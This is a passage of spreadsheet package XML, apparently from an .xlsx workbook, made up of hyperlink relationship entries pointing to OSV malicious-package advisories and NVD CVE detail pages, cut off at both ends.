Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17510" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17511" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17512" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17513" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17514" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17515" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17516" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17517" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17518" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17519" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17520" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17521" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17522" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17523" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17524" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17525" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17526" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17527" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17528" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17529" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17530" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17531" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17532" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17533" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17534" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17535" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17536" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17537" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17538" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17539" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17540" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17541" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17542" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17543" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17544" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17545" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17546" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17547" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17548" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17549" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17550" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17551" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17552" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17553" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17554" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17555" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17556" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17557" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17558" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17559" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17560" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17561" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17562" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17563" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17564" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17565" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17566" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88779" TargetMode="External" Id="rId223" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105207" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105209" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103355" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105215" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105086" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105089" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105210" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105213" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105211" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105293" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105220" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105208" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105212" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105219" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105295" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97307" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105216" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105218" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105221" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105222" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105223" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105294" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105147" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105148" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105149" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105158" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105166" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105167" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105169" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105170" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105172" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105175" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105182" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105183" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105184" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105185" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105229" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105230" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105231" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105232" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105238" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105246" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103062" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103344" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103354" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97276" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100727" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105306" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105141" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105165" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105168" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105171" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105180" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105181" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105186" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105187" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105233" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105292" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105302" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105174" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105224" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105144" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105145" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105161" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105163" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105205" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105206" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105137" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105146" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105176" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105177" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105178" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105226" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-104402" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105157" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105225" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105301" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105156" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105237" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105245" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105173" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105188" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105217" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105164" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105179" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105214" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-20285" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25777" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13607" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19954" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20519" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20520" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20521" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20522" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20523" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20524" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20525" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20526" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20527" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20528" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20529" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20530" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20531" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20532" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20533" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20534" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20535" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20536" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20537" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20538" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20539" TargetMode="External" 